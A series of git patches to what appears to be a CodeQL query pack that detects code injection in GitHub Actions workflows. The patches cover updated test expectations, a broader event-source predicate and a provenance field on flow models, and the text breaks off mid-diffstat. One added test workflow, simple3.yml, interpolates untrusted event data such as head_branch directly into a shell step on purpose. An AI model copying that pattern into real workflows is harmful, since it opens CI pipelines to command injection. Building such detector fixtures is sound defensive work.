github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index bc1fd8709507..f4df15ae3445 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -54,14 +54,20 @@ edges | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | @@ -198,14 +204,20 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | @@ -297,7 +309,7 @@ subpaths | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | From 5968da87bb807a187099fd103c2311e8ac66f9af Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 18:53:39 +0200 Subject: [PATCH 156/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f775d7511647..c1d32a1f817d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.8 +version: 0.0.9 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 2db4c237da3f..134b0db2b171 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.8 +version: 0.0.9 groups: - actions - queries From 8d2b8be133ff0f088d70baab96cb0ba8ad5762aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Apr 2024 22:32:49 +0200 Subject: [PATCH 157/707] Add github.event as a source --- .../codeql/actions/dataflow/FlowSources.qll | 8 +++++++ .../CWE-094/.github/workflows/simple3.yml | 23 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 2 ++ .../CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 4 files changed, 37 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c0e0e759120f..e07b9f76762c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -22,6 +22,13 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } +bindingset[context] +private predicate isExternalUserControlled(string context) { + exists(string reg | reg = "github\\.event" | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + bindingset[context] private predicate isExternalUserControlledIssue(string context) { exists(string reg | reg = ["github\\.event\\.issue\\.title", "github\\.event\\.issue\\.body"] | @@ -123,6 +130,7 @@ private predicate isExternalUserControlledWorkflowRun(string context) { private class EventSource extends RemoteFlowSource { EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | + isExternalUserControlled(context) or isExternalUserControlledIssue(context) or isExternalUserControlledPullRequest(context) or isExternalUserControlledReview(context) or diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml new file mode 100644 index 000000000000..be1559d47110 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -0,0 +1,23 @@ +on: + workflow_run: + workflows: + - 'prev' + types: + - completed + +permissions: + actions: read + checks: read + contents: read + +jobs: + echo_trigger: + name: Report changes + runs-on: ubuntu-latest + steps: + - name: Echo trigger + run: | + echo "head branch: ${{ github.event.workflow_run.head_branch }}" + cat << EOF + ${{ toJSON(github.event) }} + EOF diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 1a12b8e72771..a300f4dd11ea 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -200,6 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index f4df15ae3445..f025d13b1a9e 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -200,6 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | @@ -307,6 +309,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | From 0051914245f5f4e210e6bf06edff609d032ccb46 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:21:59 +0200 Subject: [PATCH 158/707] Add `.cache` to gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index 1127e8f55db1..4ba9d315acc7 100644 --- a/.gitignore +++ b/.gitignore @@ -4,3 +4,4 @@ ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ db/ +.cache \ No newline at end of file From a817a22cc7ac10417f6c7cd8c137d0d7139bf87d Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:22:36 +0200 Subject: [PATCH 159/707] Remove redundant import --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 1 - ql/lib/codeql/actions/dataflow/FlowSteps.qll | 1 - 2 files changed, 2 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c0e0e759120f..8cbca48af0a7 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,7 +1,6 @@ private import actions private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.Ast::Utils as Utils private import codeql.actions.security.ArtifactPoisoningQuery /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e66c8e7c1b95..36965166d3bc 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -6,7 +6,6 @@ private import actions private import codeql.util.Unit private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.Ast::Utils as Utils private import codeql.actions.security.ArtifactPoisoningQuery /** From c56f220b13d2dcf1c310035776369fc88d60a089 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:23:28 +0200 Subject: [PATCH 160/707] Add provenance field --- .../codeql/actions/dataflow/ExternalFlow.qll | 23 +++++++++++-------- .../internal/ExternalFlowExtensions.qll | 10 +++++--- ql/test/library-tests/test.ql | 10 ++++---- 3 files changed, 27 insertions(+), 16 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c1c93221d1af..cc7e4c633e31 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -8,9 +8,10 @@ private import actions * - action: Fully-qualified action name (NWO) * - version: Either '*' or a specific SHA/Tag * - output arg: To node (prefixed with either `env.` or `output.`) + * - provenance: verification of the model */ -predicate sourceModel(string action, string version, string output, string kind) { - Extensions::sourceModel(action, version, output, kind) +predicate sourceModel(string action, string version, string output, string kind, string provenance) { + Extensions::sourceModel(action, version, output, kind, provenance) } /** @@ -21,9 +22,12 @@ predicate sourceModel(string action, string version, string output, string kind) * - input arg: From node (prefixed with either `env.` or `input.`) * - output arg: To node (prefixed with either `env.` or `output.`) * - kind: Either 'Taint' or 'Value' + * - provenance: verification of the model */ -predicate summaryModel(string action, string version, string input, string output, string kind) { - Extensions::summaryModel(action, version, input, output, kind) +predicate summaryModel( + string action, string version, string input, string output, string kind, string provenance +) { + Extensions::summaryModel(action, version, input, output, kind, provenance) } /** @@ -33,14 +37,15 @@ predicate summaryModel(string action, string version, string input, string outpu * - version: Either '*' or a specific SHA/Tag * - input: sink node (prefixed with either `env.` or `input.`) * - kind: sink kind + * - provenance: verification of the model */ -predicate sinkModel(string action, string version, string input, string kind) { - Extensions::sinkModel(action, version, input, kind) +predicate sinkModel(string action, string version, string input, string kind, string provenance) { + Extensions::sinkModel(action, version, input, kind, provenance) } predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { exists(Uses uses, string action, string version, string kind | - sourceModel(action, version, fieldName, kind) and + sourceModel(action, version, fieldName, kind, _) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" @@ -63,7 +68,7 @@ predicate externallyDefinedStoreStep( DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c ) { exists(Uses uses, string action, string version, string input, string output | - summaryModel(action, version, input, output, "taint") and + summaryModel(action, version, input, output, "taint", _) and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and ( @@ -85,7 +90,7 @@ predicate externallyDefinedStoreStep( predicate externallyDefinedSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | - sinkModel(action, version, input, kind) and + sinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and ( if input.trim().matches("env.%") diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 89cf4de02616..8e8ce10bba9f 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,16 +5,20 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel(string action, string version, string output, string kind); +extensible predicate sourceModel( + string action, string version, string output, string kind, string provenance +); /** * Holds if a summary model exists for the given parameters. */ extensible predicate summaryModel( - string action, string version, string input, string output, string kind + string action, string version, string input, string output, string kind, string provenance ); /** * Holds if a sink model exists for the given parameters. */ -extensible predicate sinkModel(string action, string version, string input, string kind); +extensible predicate sinkModel( + string action, string version, string input, string kind, string provenance +); diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 4ee330a44662..afe382fa4d93 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -49,12 +49,14 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } -query predicate sources(string action, string version, string output, string kind) { - sourceModel(action, version, output, kind) +query predicate sources(string action, string version, string output, string kind, string provenance) { + sourceModel(action, version, output, kind, provenance) } -query predicate summaries(string action, string version, string input, string output, string kind) { - summaryModel(action, version, input, output, kind) +query predicate summaries( + string action, string version, string input, string output, string kind, string provenance +) { + summaryModel(action, version, input, output, kind, provenance) } query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } From c373238fa61c58ebb80ba0442b155173f40fa18a Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:23:53 +0200 Subject: [PATCH 161/707] Add subfolders to `dataExtensions` --- ql/lib/qlpack.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 2b3896d0cf08..deb926bafff5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -14,3 +14,4 @@ groups: - yaml dataExtensions: - ext/*.model.yml + - ext/**/*.model.yml From 5a12a2213b091001439b04e356a199446a13da6b Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:24:42 +0200 Subject: [PATCH 162/707] Add provenance to existing models --- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ql/lib/ext/TEST-RW-MODELS.model.yml | 8 ++-- ql/lib/ext/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 4 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 24 ++++++------ ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 10 ++--- ql/lib/ext/anchore_scan-action.model.yml | 2 +- .../ext/andresz1_size-limit-action.model.yml | 8 ++-- .../android-actions_setup-android.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 4 +- .../aszc_change-string-case-action.model.yml | 6 +-- ...ctions_configure-aws-credentials.model.yml | 12 +++--- .../axel-op_googlejavaformat-action.model.yml | 4 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 6 +-- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 6 +-- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 +- .../ext/bufbuild_buf-setup-action.model.yml | 4 +- ql/lib/ext/cachix_cachix-action.model.yml | 6 +-- ql/lib/ext/changesets_action.model.yml | 4 +- .../ext/cloudflare_wrangler-action.model.yml | 4 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 6 +-- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- .../ext/dailydotdev_action-devcard.model.yml | 4 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 4 +- .../dawidd6_action-ansible-playbook.model.yml | 4 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 12 +++--- ...er-practice_actions-setup-docker.model.yml | 6 +-- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 8 ++-- ql/lib/ext/expo_expo-github-action.model.yml | 4 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 4 +- ...nzdiebold_github-env-vars-action.model.yml | 4 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 4 +- ql/lib/ext/game-ci_unity-builder.model.yml | 4 +- .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- ql/lib/ext/getsentry_action-release.model.yml | 4 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- .../ext/go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../ext/gonuit_heroku-docker-deploy.model.yml | 4 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 8 ++-- .../ext/gradle_gradle-build-action.model.yml | 6 +-- ql/lib/ext/haya14busa_action-cond.model.yml | 4 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 8 ++-- ql/lib/ext/ilammy_setup-nasm.model.yml | 4 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 6 +-- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 12 +++--- .../ext/jitterbit_get-changed-files.model.yml | 14 +++---- .../ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 6 +-- .../ext/jurplel_install-qt-action.model.yml | 12 +++--- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 8 ++-- ...han_pull-request-comment-trigger.model.yml | 4 +- ...leci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 4 